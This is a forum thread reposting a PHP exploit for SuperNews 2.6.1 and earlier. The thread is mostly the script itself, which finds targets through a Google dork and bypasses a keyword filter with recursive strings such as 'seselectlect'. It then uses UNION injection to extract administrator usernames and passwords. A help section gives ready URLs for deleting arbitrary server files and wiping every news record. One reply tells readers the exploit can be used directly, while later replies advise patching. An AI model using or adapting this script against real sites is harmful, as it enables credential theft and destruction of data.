Supernews 2.6.1 sql注入漏洞
<?php# Exploit Title: Supernews <= 2.6.1 SQL 注入漏洞
# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
# Version: 2.6.1
# Tested on: Debian GNU/Linux
/*
Exploit for educational purpose only.
Note sent to the developer Fernando Pontes by e-mail 90@08sec.com
SuperNews are a brazilian news system in PHP and MySQL.
Versions priors to 2.6 have a simple SQL Injection on view news.
The developer tried to fix the bug removing keywords like "union" and "select".
But, with a recursion, it's possible to bypass this filters. See:
seselectlect
After removing "select" word, will stay another "select" word. See more:
seSELECTlect
Another SQL Injection on the administration panel:
When deleting a post, you can inject SQL for delete all news on the database.
Another vulnerability allows to delete files, on the administration panel:
When deleting a post, a variable called "unlink" will talk to the system the new's image for delete.
But it's possible to delete others files, typing all the file path or using "../".
Usage:
php exploit.php http://www.unhonker.com/supernews/
For more info about vulnerabilities:
php exploit.php moreinfo
Example:
$ php exploit.php http://www.unhonker.com/news/
Supernews <= 2.6.1 SQL Injection Exploit
[*] Trying to access server...
[*] Detecting version... :-o
[!] Version: >2.6.1 :-)
[!] Administration panel: http://www.unhonker.com/news/admin/adm_noticias.php
Type "exploit.php moreinfo" for get others vulnerabilities.
[*] Getting user & pass 8-]
User: user1
Pass: pass1
User: user2
Pass: pass2
Good luck! :-D
*/
error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);
function hex($string){
$hex=''; // PHP 'Dim' =]
for ($i=0; $i < strlen($string); $i++){
$hex .= dechex(ord($string[$i]));
}
return '0x'.$hex;
}
function str_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) {
$count = 0;
$offset = strpos($haystack, $needle);
//If we don't replace the first, go ahead and skip it
if (!$replace_first) {
$offset += strlen($needle);
$offset = strpos($haystack, $needle, $offset);
}
while ($offset !== false) {
$haystack = substr_replace($haystack, $replace, $offset, strlen($needle));
$count++;
$offset += strlen($replace);
$offset = strpos($haystack, $needle, $offset);
if ($offset !== false) {
$offset += strlen($needle);
$offset = strpos($haystack, $needle, $offset);
}
}
return $haystack;
}
function removeaddregex($str) {
return str_replace_every_other('(.*)', '', $str, null, false);
}
function preg_quote_working($str) {
$chars = explode(" ", "\ . + * ? [ ^ ] $ ( ) { } = ! < > | :");
foreach($chars as $char) {
$str = str_replace($char, "\\".$char, $str);
}
return $str;
}
echo "\nSupernews <= 2.6.1 SQL Injection Exploit";
echo "\nCoded by 08sec - www.ihonker.org\nUse at your own risk.\n\n";
if($argc!=2) {
echo "Usage:
php $argv url
Example:
php $argv http://www.unhonker.com/supernews
php $argv http://www.unhonker.com/supernews/";
exit;
}
if($argv=="moreinfo") {
echo "\nMore vulnerabilities:
- Deleting files
You can delete files on the server, after login, using the URL:
http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE
Replace \"ID\" with a valid post ID (will be deleted) and FILE with the file address on the server.
- Deleting all news on the database:
You can delete all news on the database with one request, only. Look:
http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+
All vulnerabilities discovered by WCGroup.\n";
exit;
}
$uri = $argv;
if(substr($uri, -1, 1)!="/") {
$uri .= "/";
}
$url = $uri."noticias.php?noticia=".urlencode("-1")."+";
echo "\n[*] Trying to access server...";
$accessvr = @file_get_contents($url);
if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) {
$url = $uri."index.php?noticia=".urlencode("-1")."+";
}
$token = substr(md5(chr(rand(48, 122))), 0, 10);
echo "\n[*] Detecting version... :-o";
$gettoken = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- ")));
if(preg_match("/".$token."/", $gettoken)) {
echo "\n[!] Version: >2.6.1 :-)";
$version = 1;
} else {
$gettoken = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- ")));
if(preg_match("/".$token."/", $gettoken)) {
echo "\n[!] Version =2.6.1 :-)";
$version = 2;
} else {
echo "\n[-] Unknown version :-S";
$version = 3;
}
}
if($version!=3) {
echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php";
echo "\n Type \"$argv moreinfo\" for get others vulnerabilities.";
echo "\n[*] Getting user & pass 8-]";
}
if($version==1) {
$i = 0;
while(true) {
$request = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- ")));
preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
if($get!="") {
$user = $get;
$pass = $get;
echo "\nUser: $user\nPass: $pass\n";
$i++;
} else {
echo "\nGood luck! :-D";
break;
}
}
}
elseif($version==2) {
$i = 0;
while(true) {
$request = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- ")));
preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
if($get!="") {
$user = $get;
$pass = $get;
echo "\nUser: $user\nPass: $pass\n";
$i++;
} else {
echo "\nGood luck! :-D";
break;
}
}
}
else {
echo "\n\nThis site are using an unknown version of Supernews or another CMS.";
echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
echo "\nIf you want, try to access manually:";
echo "\nThe vulnerability are on view notice file (index.php or noticia.php), in variable \"noticia\", a simple SQL Injection.";
echo "\nWe're sorry.";
}
echo "\n";
沙发支持,:) {:2_31:}都比我快, 有点头晕 这漏洞怎么用啊 k红颜 发表于 2012-5-26 10:29 static/image/common/back.gif
这漏洞怎么用啊
这是EXP。直接用就OK了
Re: Supernews 2.6.1 sql注入漏洞
感谢楼主分享这个漏洞信息。可以看到开发者尝试通过过滤关键字来修复,但递归绕过的手法确实很巧妙,也提醒我们在做安全过滤时要考虑得更全面。这个漏洞涉及SQL注入和任意文件删除,危害不小,建议还在使用Supernews 2.6.1及以下版本的朋友尽快升级或打补丁,避免被利用。Re: Supernews 2.6.1 sql注入漏洞
感谢分享这个漏洞信息,Supernews 2.6.1 的 SQL 注入和文件删除漏洞确实很危险。开发者虽然试图过滤关键字,但递归绕过方式(比如 `seselectlect`)挺有意思,直接绕过了简单的关键词屏蔽。另外管理员面板的删除功能居然还能同时注入 SQL 和删除任意文件,攻击面不小。建议还在用这个系统的尽快升级或打补丁。楼主有试验过成功利用的实例吗?Re: Supernews 2.6.1 sql注入漏洞
感谢分享这个漏洞详情,尤其是提到的过滤绕过方法(递归替换 `select`)很有意思,开发者只做了简单过滤确实容易绕过。另外管理后台的 SQL 注入和文件删除漏洞也值得注意。建议大家检查自己的 Supernews 版本,及时更新到最新版或寻找替代方案。
页:
[1]